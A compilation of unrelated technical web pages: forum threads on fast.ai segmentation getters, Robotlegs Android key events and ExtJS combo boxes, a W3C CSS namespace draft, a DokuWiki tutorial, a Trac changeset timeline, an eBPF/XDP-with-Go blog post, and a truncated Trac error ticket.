Image segmentation with Unet. I put all image and mask attributes in a Pandas dataframe and process them depending on the attributes. Code sample:

```python
def make_mask(row):
    """
    Is called by DataBlock(getters=).
    Takes a list of paths to mask files from a Pandas column.
    Makes sure all masks are 8 bits per pixel.
    If there are multiple masks, merges them.
    Returns a PILMask.create() mask image.
    """
    f = ColReader("mask")
    # PILMask.create() probably forces 8 bits per pixel.
    all_images = [np.asarray(PILMask.create(x)) for x in f(row)]
    image_stack = np.stack(all_images)
    image_union = np.amax(image_stack, axis=0)
    return PILMask.create(image_union)

def make_image(row):
    """
    Receives a Pandas row.
    Gets an image path from the "image" column.
    Makes sure all images are 8 bits per color channel.
    (There may be multiple color channels.)
    Returns a PILImage.create() image.
    """
    f = ColReader("image")
    # PILImage.create() probably forces 8 bits per color channel.
    image_array = np.asarray(PILImage.create(f(row)))
    return PILImage.create(image_array)

# Most images are 960 x 720. A few images are much larger. So we resize to 960 x 720 first.
# The final resize is to the desired image size for the model.
crop_datablock = DataBlock(
    blocks=(ImageBlock, MaskBlock),
    getters=[make_image, make_mask],
    splitter=TrainTestSplitter(stratify=crop_df["dataset"].to_list()),
    item_tfms=item_tfms,
)
```

Image augmentation is done with Albumentations in the item_tfms, which is not shown here. I have a separate question about that here: I need to differentiate between training and validation in terms of the processing I apply to images and masks. I have a hard time doing that with item_tfms, as you can see in the previous thread. I think I could shift all that processing to the getter functions, since they already do some low-level processing (changing the bits per pixel, merging masks, etc).
There is one issue: how do I tell, from within a getter function, whether the image or mask is for training or for validation?
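As an aside, the mask-merging step in make_mask() above — stacking the per-file masks and taking a pixel-wise maximum — can be sketched with plain NumPy. The three toy masks below are made up for illustration; they stand in for decoded single-channel mask files:

```python
import numpy as np

# Three hypothetical single-channel binary masks (as decoded from mask files).
masks = [
    np.array([[0, 255], [0, 0]], dtype=np.uint8),
    np.array([[0, 0], [255, 0]], dtype=np.uint8),
    np.array([[0, 0], [0, 0]], dtype=np.uint8),
]

# Stack into shape (n_masks, H, W), then take the pixel-wise maximum:
# a pixel belongs to the union if it is set in any individual mask.
union = np.amax(np.stack(masks), axis=0)
print(union.tolist())  # [[0, 255], [255, 0]]
```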
https://forums.fast.ai/t/datablock-can-a-getter-tell-whether-the-image-is-for-training-vs-validation/99131
Copyright © 2006 W3C® (MIT, ERCIM, Keio), All Rights Reserved. W3C liability, trademark and document use rules apply.

Comments on this draft may be sent to the public CSS mailing list with “css3-namespace” in the subject, preferably like this: “[css3-namespace] …summary of comment…”.

This document is a draft of a module of CSS (Cascading Style Sheets). It is derived with minimal change from the CSS3 Namespace Enhancements syntax proposal from 1999, with which the CSS WG has been in agreement for many years and which is already implemented in user agents. The material from that proposal found its way into drafts of [SELECT], [CSS3SYN] and [CSS3VAL]. [SELECT] is currently a Candidate Recommendation. Unfortunately, [CSS3SYN] has dependencies on (potentially) all other CSS3 modules and this, plus work on CSS2.1, has delayed the availability of this specification. To break the chain of dependencies and allow faster progress on the Recommendation track, the present module has been split out. It is primarily intended as a CSS module, though it could also be referenced by [SVG12] or indeed [CSS21].

This section is informative. This specification defines the syntax for using namespaces in CSS. It introduces the @namespace rule for declaring a default namespace and for binding namespaces to namespace prefixes. This specification also defines a syntax for using those prefixes in namespace-qualified names, but does not define where such names are valid or what they mean. The terminology used in this specification is that of [XML-NAMES11]. (Do we really need this sentence?)

A user agent cannot claim conformance to this specification alone, but can claim conformance to this specification if it satisfies the conformance requirements in this specification when implementing CSS or another host language that normatively references this specification. The key words “must”, “must not”, “required”, “shall”, “shall not”, “should”, “should not”, “recommended”, “may”, and “optional” in this specification are to be interpreted as described in [RFC2119]. However, for readability, these words do not appear in all uppercase letters in this specification. All of the text of this specification is normative except examples, notes, and sections explicitly marked as non-normative.
The @namespace rule

The @namespace at-rule declares a namespace prefix and associates it with a given namespace (a string). This namespace prefix can then be used in namespace-qualified names such as those described in the Selectors Module [SELECT] or the Values and Units module [CSS3VAL]. Based on XML Namespaces [REC-XML-NAMES], the syntax for the @namespace rule is as follows (using the notation from the Grammar appendix of CSS2.1 [CSS21]):

namespace
  : NAMESPACE_SYM S* [namespace_prefix S*]? [STRING|URI] S* ';' S*
  ;
namespace_prefix
  : IDENT
  ;

with the new token:

NAMESPACE_SYM : "@namespace"

A style sheet containing an invalid @namespace rule is non-conforming. A URI string parsed from the url() syntax must be treated as a literal string: no URI-specific normalization is applied. For this reason the string syntax is recommended, and the url() syntax discouraged (deprecated?). The namespace prefix is declared only within the style sheet in which its @namespace rule appears, and not in any style sheets imported by that style sheet, style sheets that import that style sheet, or any other style sheets applying to the document. A namespace prefix, once declared, represents the namespace for which it was declared and can be used to indicate the namespace of a namespace-qualified name. If the namespace prefix is omitted, the rule declares the default namespace. As in [XML-NAMES], in Selectors [SELECT] the default namespace applies to type selectors, but it does not apply to attribute selectors. There is no default default namespace: modules that assign unqualified names to the default namespace must define how those unqualified names are to be interpreted when no default namespace is declared. Namespace prefixes are, like CSS property names, case-insensitive. If a namespace prefix or default namespace is declared more than once, only the last declaration shall be used. CSS qualified names can be used in some contexts (for example, selectors and property values) as described in other modules.
Those modules should define the use of a namespace prefix that has not been properly declared as a parsing error that will cause the selector or declaration (etc.) to be considered invalid and ignored. This draft borrows heavily from earlier drafts on CSS namespace support by Chris Lilley and by Peter Linss [CSS3NAMESPACE]. Thanks to Ian Hickson, Björn Höhrmann, Anne van Kesteren, and L. David Baron for their comments.
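For illustration (this example is mine, not from the draft), a style sheet using the recommended string syntax might declare a default namespace and a prefix, then use that prefix in a namespace-qualified type selector as defined by the Selectors module:

```css
@namespace "http://www.w3.org/1999/xhtml";      /* default namespace */
@namespace svg "http://www.w3.org/2000/svg";    /* prefix "svg" */

/* Unprefixed type selectors fall in the default (XHTML) namespace */
a { color: blue; }

/* "svg|" qualifies the element name with the SVG namespace */
svg|circle { fill: crimson; }
```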
http://www.w3.org/TR/2006/WD-css3-namespace-20060828/
What is the best way to listen for key events?

Hi all, I hope someone can help. I am creating an Adobe AIR for Android app and I have a problem. I need to navigate through the app using the hardware key on the phone, which dispatches a keyCode of Keyboard.BACK. Here is how I have wired everything up. In the app context I have added a listener to the stage, see below:

```actionscript
contextView.stage.addEventListener(KeyboardEvent.KEY_DOWN, dispatchEvent);
commandMap.mapEvent(KeyboardEvent.KEY_DOWN, BackCommand, KeyboardEvent);
```

This listens for a key event, then calls the BackCommand, which takes action. The back command looks like the below:

```actionscript
public class BackCommand extends Command
{
    [Inject]
    public var appModel:AppModel;

    [Inject]
    public var evt:KeyboardEvent;

    public override function execute():void
    {
        evt.preventDefault();
        evt.stopImmediatePropagation();
        // make sure we have a section to go back to
        appModel.currHistoryPos--;
        if (appModel.currHistoryPos < 0)
        {
            // reset the var; if we don't it will error
            appModel.currHistoryPos = -1;
        }
        //trace("key registered.... " + evt, "curr back num is: " + appModel.currHistoryPos);
        if (evt.keyCode == Keyboard.BACK)
        {
            if (appModel.currHistoryPos >= 0)
            {
                if (exitSection(appModel.currSection) == true)
                {
                    // if we have reached the top of the app sections (either library, browse or create), exit the app
                    appModel.nextSection = Sections.EXIT;
                    dispatch(new AppEvent(AppEvent.SECTION_CHANGE));
                }
                else
                {
                    // only if the hardware back key has been pressed do this
                    trace("//================ key registered.... " + appModel.currHistoryPos);
                    // tells the app we are using its buttons to navigate.
                    // This is used for the history memory, so when back is pressed we can go back to the previous section
                    appModel.navType = "back";
                    // grab the new section and set it to be the next section, then dispatch an event to the app to jump to that section
                    var backSection:String = appModel.backMemory[appModel.currHistoryPos];
                    appModel.nextSection = backSection;
                    dispatch(new AppEvent(AppEvent.SECTION_CHANGE));
                }
            }
        }
    }
}
```

The problem I am having is that Back seems to exit the app, which it should not do; it should just move to the previous view. So I was wondering, am I setting up the keyboard event right? If you could guide me with an example that would be great. Regards, Mike :)

1. Posted by Michal Wroblews... on 27 Jul, 2011 08:36 PM
You should use evt.preventDefault() to prevent the app from closing on the Back button, and you're using it. Please try to do the same without any command mapping, as a check: just addEventListener and, in the handler method, use preventDefault(); remove evt.stopImmediatePropagation(), by the way. And what is contextView.stage.addEventListener(KeyboardEvent.KEY_DOWN, dispatchEvent); doing? Maybe the dispatchEvent handler stops immediate propagation?

2. Posted by Mike oscar on 27 Jul, 2011 08:52 PM
Hi Michal, I have tried it without the command and it works, but my implementation above does not. So this leads me to believe that I need to do this differently, as I think preventDefault() is not working the way it is set up. Is there a different way to do the above so the event is passed directly to the function? Any code will help. Regards, Mike :)

3. Posted by Michal Wroblews... on 28 Jul, 2011 10:37 AM
Looks like not the same instance of the event is passed to the command, or something else causes the problem. Do it this way: 1. Leave the listener without the command; it will prevent the default behavior. Don't use stopImmediatePropagation(). 2. Use your own logic as you described in your command; you don't have to preventDefault here. Please debug your application and place breakpoints in both the command and the key listener. Check if the events are the same instances (compare memory pointers). Thanks, Mike

4. Posted by Stray on 28 Jul, 2011 10:44 AM
The clone() will mean that the events are unlikely to be the same instances.

5. Posted by Michal Wroblews... on 28 Jul, 2011 10:45 AM
When are events cloned?

6. Posted by Shawn on 29 Jul, 2011 09:46 PM
Why would RL clone the event? Can't it just pass along the original reference to the command?

7. Posted by Michal Wroblews... on 29 Jul, 2011 09:57 PM
Shawn, no idea. I'm using SignalCommandMap and if I need to pass an event I just pass it there :) So I haven't faced the problem. Thanks for letting us know. Probably it should be filed as a bug. Mike

8. Posted by Robert Penner (Support Staff) on 14 Sep, 2011 07:25 PM
If you redispatch an Event, EventDispatcher automatically clones it, because the Event's target and currentTarget properties could be different.

Ondina D.F. closed this discussion on 21 Nov, 2011 09:09 AM.
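The advice in comments 1–3 — a plain stage listener that calls preventDefault() itself, with the navigation logic kept out of the command mapping — can be sketched as follows. This is my own illustration, not code from the thread; navigateBack() is a placeholder for the history logic in BackCommand:

```actionscript
// Plain listener on the stage; no command mapping involved.
contextView.stage.addEventListener(KeyboardEvent.KEY_DOWN, onKeyDown);

function onKeyDown(evt:KeyboardEvent):void
{
    if (evt.keyCode == Keyboard.BACK)
    {
        // Stop AIR from closing the app on the hardware Back button.
        evt.preventDefault();
        // Run your own history/navigation logic here
        // (what BackCommand.execute() does in the thread).
        navigateBack();
    }
}
```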
http://robotlegs.tenderapp.com/discussions/problems/354-what-is-the-best-way-to-listen-for-key-events
How to create pages in DokuWiki

Now that you've installed DokuWiki, the next thing we're going to show you how to do is create your first page. We're going to go over the basics of creating pages, and in future tutorials we'll go more in depth. By default, anyone can create pages in DokuWiki. To create a new page, you'll actually use the search feature within your wiki to search for the page that you want to create. After searching, as long as the page doesn't exist, DokuWiki will give you a link you can click on that will allow you to create this page. Let's learn how to create pages in DokuWiki.

How to create a page
- Log into DokuWiki.
- Type the name of the page you want to create in the search field towards the top right of your DokuWiki site. In our testing, we want to create a page named "HTML Basics". As you can see in the screenshot to the right, we searched our DokuWiki site for this page.
- Click the magnifying glass to search for the title.
- Next, if the title is not already created on the site, you should see "Nothing was found" in the search results. Click "Create this page" from the menu to the right.
- Enter the text you want for the header title and the body text.
- Click Save.

Now the page will show the new header title and the body text you added to the content of the page. Also, due to the nature of wiki software, other people who read the article you just created can improve upon it and edit it.

Note! To find your pages on your DokuWiki site, click the "Sitemap" link towards the top right of your DokuWiki site. There you will find a list of all pages that are on your site.

That's all there is to it! Again, we just went over the very basics of creating pages. When creating pages, you will want to know how to create namespaces. Namespaces organize your pages into categories for easy management. Click here to learn how to format content and add images to your new page as well.
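As a small aside not covered in this tutorial: the "header title" you enter in the editor is just DokuWiki heading markup, which you can also type directly. A minimal page body for our "HTML Basics" example might look like:

```
====== HTML Basics ======

HTML is the standard markup language for web pages.

===== A smaller sub-heading =====
```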
http://www.inmotionhosting.com/support/edu/dokuwiki/writing-content-dokuwiki/edit-create-delete-restore-dokuwiki
…
- 7:18 PM Changeset [2705] by - * mean.c: implement pipi_mean() to compute a mean image.
- 7:18 PM Changeset [2704] by - * Support --autocontrast in pipi.
- 12:57 AM Changeset [2703] by - * convolution.c: support for wrap-around in convolutions. * pipi.c: …
- 12:35 AM Ticket #43 (inherit attributes) created by - Image attributes such as wrap behaviour should be inherited when …
- 12:02 AM Changeset [2702] by - * pipi.c: implement the "--gray" flag for grayscale conversion.
- 12:02 AM Changeset [2701] by - * convolution_template.h: split convolution routines into separate …

Aug 11, 2008:
- 10:02 PM Changeset [2700] by - * jajuni.c: add Jarvis-Judice-Ninke dithering. It's a …
- …
- 10:02 PM Changeset [2695] by - * codec.c: support for stock images in pipi_load(). * stock.c: start …
- 2:51 AM Changeset [2694] by - * context.c: implement various dithering commands and Gaussian blur. …
- 2:51 AM Changeset [2693] by - * Start working on "pipi", a command-line libpipi tool. It will be …
- 2:50 AM Changeset [2692] by - * Add functions that handle a stack-based processing queue.

Aug 10, 2008:
- 7:01 PM Changeset [2691] by - * More testing.
- 7:00 PM Changeset [2690] by - * Testing.
- 6:55 PM Changeset [2689] by - * Experiment with the trac menu.
- 6:37 PM Changeset [2688] by - * Fix top menu.
- 6:30 PM Changeset [2687] by - * Smaller buttons. * Try to create a menu header.
- 5:29 PM Changeset [2686] by - * Fix stylesheet path and name.
- 5:18 PM Changeset [2685] by - * cgi-bin should be part of the trac installation.
- 5:16 PM Changeset [2684] by - * convolution.c: fix a small memory leak in the convolution filter.
- 5:16 PM Changeset [2683] by - * Move template stuff to the Trac 0.11 layout.
- 5:01 PM Changeset [2682] by - * Import files for a Trac 0.11 installation.

Aug 8, 2008:
- 8:11 PM Changeset [2681] by - * blur.c: implement box blur; currently runs in O(n) but we could make …
- 8:11 PM Changeset [2680] by - * autocontrast.c: simple autocontrast filter; does not work very well.
- 8:11 PM Changeset [2679] by - * Get rid of test.c, it was no longer useful anyway.
- 8:07 PM Changeset [2678] by - * Handle alpha layer in floodfill (but don't make it conditionnal to …
- 10:21 AM Changeset [2677] by - * Test stuff for the Rubik's cube colour reduction.

Aug 7, 2008:
- 5:21 PM Changeset [2676] by - * First shot of a floodfiller (both u32 and float, 4 neighbours)

Aug 6, 2008:
- 10:58 PM Changeset [2675] by - * Don't crash when an option with mandatory argument is passed last
- 10:45 PM Changeset [2674] by - * Fix a fd leak when connection to the socket fails

Aug 5, 2008:
- 2:19 PM Changeset [2673] by - * As to_grab and to_start are now part of screen_list, no need to have …
- 12:31 PM libpipi edited by - (diff)

Aug 4, 2008:
- 11:50 PM Changeset [2672] by - * dbs.c: generate the initial halftone using random dithering instead …
- 11:49 PM Changeset [2671] by - * random.c: implement random dithering using a deterministic pseudo-RNG.
- 9:08 PM libpipi created by - libpipi page
- 7:23 PM Changeset [2670] by - * Dithering algorithms no longer modify the original image.
- 7:23 PM Changeset [2669] by - * pipi.c: fix a memory leak caused by empty picture having …
- 7:23 PM Changeset [2668] by - * pipi.c: implement pipi_copy().
- 7:23 PM Changeset [2667] by - * pixels.c: store byte length and bits-per-pixel value in the …
- 7:23 PM Changeset [2666] by - * Prefix dithering functions with _dither_ to avoid namespace cluttering.
- 7:23 PM Changeset [2665] by - * ordered.c: implement Bayer dithering (pretty trivial).

Aug 3, 2008:
- 8:36 PM Changeset [2664] by - * dbs.c: optimise DBS by ignoring 16x16 cells that had no pixel …
- 8:36 PM Changeset [2663] by - * dbs.c: improve the DBS human visual system kernel by adding two …
- 6:03 PM Changeset [2662] by - * sharpen.c: add a sharpen filter example, using our generic …
- 5:54 PM Changeset [2661] by - * blur.c: remove the blurring code and use our generic convolution …
- 5:54 PM Changeset [2660] by - * convolution.c: automatically detect when a convolution filter is …
- 5:54 PM Changeset [2659] by - * blur.c: fix the blur example’s argument checking.
- 5:54 PM Changeset [2658] by - * convolution.c: generic convolution method. Does not take advantage …
- 1:48 PM Changeset [2657] by - * edd.c: output MSD instead of RMSD in the displacement computation.
- 1:48 PM Changeset [2656] by - * Error diffusion methods now support either raster or serpentine scan.
- 1:47 PM Changeset [2655] by - * pixels.c: support more conversion combinations.
- 5:31 AM Changeset [2654] by - * ostromoukhov.c: Ostromoukhov's simple error diffusion algorithm.
- 5:30 AM Changeset [2653] by - * floydsteinberg.c: perform Floyd-Steinberg dithering on a serpentine path.
- 4:17 AM Changeset [2652] by - * dither.c: add an example program for dithering methods.
- 4:17 AM Changeset [2651] by - * dbs.c: new dithering function: Direct Binary Search. One of the best …
- 4:17 AM Changeset [2650] by - * measure.c: there is now pipi_measure_msd in addition to …

Aug 2, 2008:
- 11:24 PM Changeset [2649] by - * Check a few more realloc, and return when they fail
- 11:22 PM Changeset [2648] by - * Check a few more malloc, and output errors on stderr
- 6:56 PM Changeset [2647] by - * edd.c: output E_fast as well.
- 2:47 PM Changeset [2646] by - * Set default (temporary) size of initial term to 80x80 to avoid …
- 2:29 PM Changeset [2645] by - * Move the end of options parsing into handle_command_line
- 2:13 PM Changeset [2644] by - * edd.c: example program that computes the Floyd-Steinberg …
- 2:12 PM Changeset [2643] by - * blur.c: adapt the kernel size to large values of dx and/or dy. * …
- 1:32 PM Changeset [2642] by - * Moved most of the command line parsing to its own function
- 12:53 PM Changeset [2641] by - * Added window list and window selection by name using ctrl-a-"
- 12:52 PM Changeset [2640] by - * Fill TODO with nice wishes
- 12:23 PM Changeset [2639] by - * We can now choose current window with ctrl-a-N where N is 0-9
- 11:51 AM Changeset [2638] by - * Don't quit if a refresh doesn't work. Problem must be tougher as …
- 2:01 AM Changeset [2637] by - * Add Floyd-Steinberg grayscale dithering.
- 2:01 AM Changeset [2636] by - * pixels.c: fix a typo in the dithering method that could cause crashes.
- 2:01 AM Changeset [2635] by - * measure.c: started writing error/measure functions. First one is RMSD.
- 2:01 AM Changeset [2634] by - * blur.c: support for greyscale images.
- 2:01 AM Changeset [2633] by - * pixels.c: start supporting grayscale images.
- 2:01 AM Changeset [2632] by - * codec.c: bump Imlib2 and OpenCV priorities over SDL.
- 2:01 AM Changeset [2631] by - * opencv.c: bring the OpenCV codec up to date.
- 2:00 AM Changeset [2630] by - * pixels.c: add support for 24-bpp BGR format.
- 2:00 AM Changeset [2629] by - * pipi.c: reimplement pipi_new() without relying on the underlying …
- 2:00 AM Changeset [2628] by - * configure.ac: fix the OpenCV detection by using pkg.
http://caca.zoy.org/timeline?from=2008-08-27T11%3A44%3A26%2B02%3A00&precision=second
Search: Search took 0.04 seconds.

- 8 Feb 2010 2:26 AM: beforeselect event of a combo fires after it shows the drop down data. then.. i've found another event... expand : ( Ext.form.ComboBox combo ) it...
- 7 Feb 2010 4:31 PM: I explore the combo's method/event/property then noticed the following that might be help to filter my drop down data. 1) doQuery( String query, Boolean forceAll ) : ...
- 7 Feb 2010 4:16 PM: var reader = new Ext.data.JsonReader({ totalProperty: 'total', successProperty: 'success', idProperty: 'id', root: 'data', messageProperty: 'message' // <-- New...
- 4 Feb 2010 11:45 PM: same result Sir var comboStatus = new Ext.form.ComboBox({ mode: 'local', lazyRender: true, forceSelection: true, selectOnFocus: true, store: new Ext.data.ArrayStore({
- 4 Feb 2010 11:17 PM: the initial value of combobox doesn't display.. please see the attached image and codes below... 18601 var comboStatus = new Ext.form.ComboBox({ mode: 'local', lazyRender: true,
- 4 Feb 2010 10:23 PM: code from ComboBox API Doc var combo = new Ext.form.ComboBox({ mode: 'local', store: new Ext.data.ArrayStore({ id: 0, fields: [ 'myId', // numeric value...
- 4 Feb 2010 10:11 PM: combobox's store is automatically calls by the editorgrid? if yes, the combobox's store must have same id with the editorgrid's store in order to map the corresponding row inside the editorgrid...?
- 4 Feb 2010 9:51 PM (Replies: 2, Views: 848): forgot the quotes and brackets... correct json string format json = "{" + "'total':8, 'success':true, 'message':'message1', " + " 'data':[" + " {'id':1,...
- 4 Feb 2010 9:45 PM (Replies: 2, Views: 848): i'll check my json... it seems to be invalid..
- 4 Feb 2010 9:25 PM (Replies: 2, Views: 848): most of the code is base from Ext.data.DataWriter Example the below code successfully called the Ext.data.HttpProxy api read url and confirmed by checking the firebug watch & console. there is...
- 4 Feb 2010 7:28 PM (Replies: 3, Views: 1,273): This thread was [RESOLVED] please refer to Animal's & Condor's messages.
- 4 Feb 2010 7:26 PM: .
- 4 Feb 2010 7:22 PM: Thanks Sir jgarcia, will try beforeedit event.. Thanks Sir ironlion for the beforeedit event sample But this thread, focusing on the combobox values only.. and my other thread you stated is...
- 4 Feb 2010 7:09 PM (Replies: 6, Views: 1,628): Sir ironlion... those threads are started by me.. those are different topics..
- 4 Feb 2010 6:28 PM: Thanks Sir ironlion.. Yes Sir you're right, I created editor grid and successfully fills the combobox but would like do some customization on the values. in every row in the editor grid, the...
- 4 Feb 2010 6:13 PM (Replies: 6, Views: 1,628): >>the renderer's function's arguments are automatically pass by the ExtJs? >Yes! Thanks for confirmation Sir. actually that is one the problem with the API Doc...all possible arguments in the...
- 4 Feb 2010 4:32 PM (Replies: 6, Views: 1,628): Sir Thanks a lot.. the renderer's function's arguments are automatically pass by the ExtJs? the counter variable inside the renderer's function is your own variable? or provided by the ExtJs? ...
- 4 Feb 2010 4:06 PM: yes Sir, based on the grid's store responded by the server. or is there other approach.. e.g. displayed values when drop down row1 : OK ...
- 4 Feb 2010 3:10 AM: i created combobox within the grid but would like to fills the combobox data depends on the server's response.. the server's response is array inside the json string.
- 3 Feb 2010 6:43 PM (Replies: 6, Views: 1,628): the grid fills data from the server and set the comboBox's initial displayed value comboBox in grid contains "OK" "OK Error" "Not Good" would like to disable the comboBox if the initial displayed...
- 2 Feb 2010 11:33 PM (Replies: 2, Views: 2,549): Please visit and vote in order to be full pledged client framework..
- 20 Jan 2010 8:39 PM (Replies: 4, Views: 930): 1. buttonAlign works great with buttons. thanks ;) 2. i removed the fieldLabel because i've noticed that i need only the textfield... but it shows nothing but a right indented Search button... ...
- 20 Jan 2010 8:17 PM (Replies: 3, Views: 1,273): i have button with click event then would like to execute a custom created url protocol in my local pc. it is easy to implement this using <a> but please guide me using Ext.Button click event... ...
- 20 Jan 2010 1:43 AM (Replies: 2, Views: 2,126): Rosenprot.layouts.StandardLayout was successfully created.. then error occured during Viewport creation... entry point: Ext.namespace('Rosenprot', 'Rosenprot.layouts'); ...
- 20 Jan 2010 12:00 AM (Replies: 4, Views: 930): i am not using 2.x.. i am using 3.1 as stated with my signature.. could you assist me to placed it?

Results 1 to 25 of 94
http://www.sencha.com/forum/search.php?s=c606a6287d4f38613e026b6d594a35cb&searchid=3105162
eBPF has a thriving ecosystem with a plethora of educational resources, both on the subject of eBPF itself and on its various applications, including XDP. Where it becomes confusing is the choice of libraries and tools to interact with and orchestrate eBPF. Here you have to select between the Python-based BCC framework, the C-based libbpf and a range of Go-based libraries from Dropbox, Cilium, Aqua and Calico. Another important area that is often overlooked is the “productionisation” of eBPF code, i.e. going from manually instrumented examples towards production-grade applications like Cilium. In this post, I’ll document some of my findings in this space, specifically in the context of writing a network (XDP) application with a userspace controller written in Go.

Choosing an eBPF library

In most cases, an eBPF library is there to help you achieve two things:

- Load eBPF programs and maps into the kernel and perform relocations, associating an eBPF program with the correct map via its file descriptor.
- Interact with eBPF maps, allowing all the standard CRUD operations on the key/value pairs stored in those maps.

Some libraries may also help you attach your eBPF program to a specific hook, although for networking use cases this may easily be done with any existing netlink API library. When it comes to the choice of an eBPF library, I’m not the only one confused (see [1], [2]). The truth is each library has its own unique scope and limitations:

- Calico implements a Go wrapper around CLI commands made with bpftool and iproute2.
- Aqua implements a Go wrapper around the libbpf C library.
- Dropbox supports a small set of programs but has a very clean and convenient user API.
- IO Visor’s gobpf is a collection of Go bindings for the BCC framework, which has a stronger focus on tracing and profiling.
- Cilium and Cloudflare are maintaining a pure Go library (referred to below as libbpf-go) that abstracts all eBPF syscalls behind a native Go interface.
For my network-specific use case, I’ve ended up using libbpf-go due to the fact that it’s used by Cilium and Cloudflare and has an active community, although I really liked (the simplicity of) the one from Dropbox and could’ve used it as well. In order to familiarise myself with the development process, I’ve decided to implement an XDP cross-connect application, which has a very niche but important use case in network topology emulation. The goal is to have an application that watches a configuration file and ensures that local interfaces are interconnected according to the YAML spec from that file. Here is a high-level overview of how xdp-xconnect works:

The following sections will describe the application build and delivery process step by step, focusing more on integration and less on the actual code. Full code for xdp-xconnect is available on Github.

Step 1 - Writing the eBPF code

Normally this would be the main section of any “Getting Started with eBPF” article; however, this time it’s not the focus. I don’t think I can help others learn how to write eBPF, but I can refer to some very good resources that can:

- Generic eBPF theory is covered in a lot of detail on ebpf.io and Cilium’s eBPF and XDP reference guide.
- The best place for some hands-on practice with eBPF and XDP is the xdp-tutorial. It’s an amazing resource that is definitely worth reading even if you don’t end up doing the assignments.
- Cilium source code and its analysis in [1] and [2].

My eBPF program is very simple: it consists of a single call to the eBPF helper function bpf_redirect_map(), which redirects all packets from one interface to another based on the index of the incoming interface.

```c
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

/* xconnect_map, the interface-to-interface map, is defined elsewhere
   in the source and referenced here by name. */
SEC("xdp")
int xdp_xconnect(struct xdp_md *ctx)
{
    return bpf_redirect_map(&xconnect_map, ctx->ingress_ifindex, 0);
}
```

In order to compile the above program, we need to provide search paths for all the included header files.
The easiest way to do that is to make a copy of everything under linux/tools/lib/bpf/; however, this will include a lot of unnecessary files. So an alternative is to create a list of dependencies:

```shell
$ clang -MD -MF xconnect.d -target bpf -I ~/linux/tools/lib/bpf -c xconnect.c
```

Now we can make a local copy of only the small number of files specified in xconnect.d and use the following command to compile the eBPF code for the local CPU architecture:

```shell
$ clang -target bpf -Wall -O2 -emit-llvm -g -Iinclude -c xconnect.c -o - | \
  llc -march=bpf -mcpu=probe -filetype=obj -o xconnect.o
```

The resulting ELF file is what we’d need to provide to our Go library in the next step.

Step 2 - Writing the Go code

Compiled eBPF programs and maps can be loaded by libbpf-go with just a few instructions. By adding a struct with ebpf tags we can automate the relocation procedure, so that our program knows where to find its map:

```go
spec, err := ebpf.LoadCollectionSpec("ebpf/xconnect.o")
if err != nil {
    panic(err)
}

var objs struct {
    XCProg *ebpf.Program `ebpf:"xdp_xconnect"`
    XCMap  *ebpf.Map     `ebpf:"xconnect_map"`
}
if err := spec.LoadAndAssign(&objs, nil); err != nil {
    panic(err)
}
defer objs.XCProg.Close()
defer objs.XCMap.Close()
```

Type ebpf.Map has a set of methods that perform standard CRUD operations on the contents of the loaded map:

```go
err = objs.XCMap.Put(uint32(0), uint32(10))

var v0 uint32
err = objs.XCMap.Lookup(uint32(0), &v0)

err = objs.XCMap.Delete(uint32(0))
```

The only step that’s not covered by libbpf-go is the attachment of programs to network hooks. This, however, can easily be accomplished by any existing netlink library, e.g. vishvananda/netlink, by associating a network link with a file descriptor of the loaded program:

```go
link, err := netlink.LinkByName("eth0")
err = netlink.LinkSetXdpFdWithFlags(*link, c.objs.XCProg.FD(), 2)
```

Note that I’m using the SKB_MODE XDP flag to work around the existing veth driver caveat.
Although the native XDP mode is considerably faster than any other eBPF hook, SKB_MODE may not be as fast due to the fact that packet headers have to be pre-parsed by the network stack (see video).

Step 3 - Code Distribution

At this point everything would have been ready to package and ship our application if it weren’t for one problem: eBPF code portability. Historically, this process involved copying the eBPF source code to the target platform, pulling in the required kernel headers and compiling it for the specific kernel version. This problem is especially pronounced for tracing/monitoring/profiling use cases, which may require access to pretty much any kernel data structure, so the only solution is to introduce another layer of indirection (see CO-RE). Network use cases, on the other hand, rely on a relatively small and stable subset of kernel types, so they don’t suffer from the same kind of problems as their tracing and profiling counterparts. Based on what I’ve seen so far, the two most common code packaging approaches are:

- Ship the eBPF code together with the required kernel headers, assuming they match the underlying kernel (see Cilium).
- Ship the eBPF code and pull in the kernel headers on the target platform.

In both of these cases, the eBPF code is still compiled on the target platform, which is an extra step that needs to be performed before the user-space application can start. However, there’s an alternative, which is to pre-compile the eBPF code and only ship the ELF files. This is exactly what can be done with bpf2go, which can embed the compiled code into a Go package. It relies on go generate to produce a new file with the compiled eBPF and libbpf-go skeleton code, the only requirement being the //go:generate instruction.
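For illustration, a bpf2go invocation is typically wired up with a go:generate comment in the Go package that uses the program. The exact arguments below (the "xdp" identifier and the module path) are my own sketch rather than taken from the post, but the "xdp" identifier is what would yield generated helper names like the newXdpSpecs() seen in the next step:

```go
package main

// bpf2go compiles xconnect.c with clang and generates Go files that
// embed the resulting ELF bytes plus typed skeleton code; `go generate`
// runs the directive below.
//go:generate go run github.com/cilium/ebpf/cmd/bpf2go xdp xconnect.c

func main() {}
```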
Once generated, our eBPF program can be loaded with just a few lines (note the absence of any arguments):

specs, err := newXdpSpecs()
objs, err := specs.Load(nil)

The obvious benefit of this approach is that we no longer need to compile on the target machine and can ship both the eBPF and userspace Go code in a single package or Go binary. This is great because it allows us to use our application not only as a binary but also to import it into any 3rd-party Go application (see usage example).

Reading and Interesting References

Generic Theory:
BCC and libbpf:
eBPF/XDP performance:
Linux Kernel Coding Style:
libbpf-go example programs:
bpf2go:
XDP example programs:
https://networkop.co.uk/post/2021-03-ebpf-intro/
Opened 10 years ago Closed 9 years ago Last modified 8 years ago #4280 closed defect (wontfix) ImportError: No module named posixpath Description In r4363, accessing any trac url:

Traceback (most recent call last):
  File "/usr/lib/python2.4/site-packages/trac/web/api.py", line 319, in send_error
    if self.hdf and template.endswith('.cs'): # FIXME: remove this
  File "/usr/lib/python2.4/site-packages/trac/web/api.py", line 161, in __getattr__
    value = self.callbacks[name](self)
  File "/usr/lib/python2.4/site-packages/trac/web/main.py", line 251, in _get_hdf
    hdf = HDFWrapper(loadpaths=Chrome(self.env).get_all_templates_dirs())
  File "/usr/lib/python2.4/site-packages/trac/web/chrome.py", line 305, in get_all_templates_dirs
    dirs += provider.get_templates_dirs()
  File "build/bdist.linux-i686/egg/tracrpc/web_ui.py", line 76, in get_templates_dirs
  File "/usr/lib/python2.4/site-packages/setuptools-0.7a1dev_r52437-py2.4.egg/pkg_resources.py", line 16, in ?
    import sys, os, zipimport, time, re, imp, new, pkgutil # XXX
  File "/usr/lib/python2.4/os.py", line 48, in ?
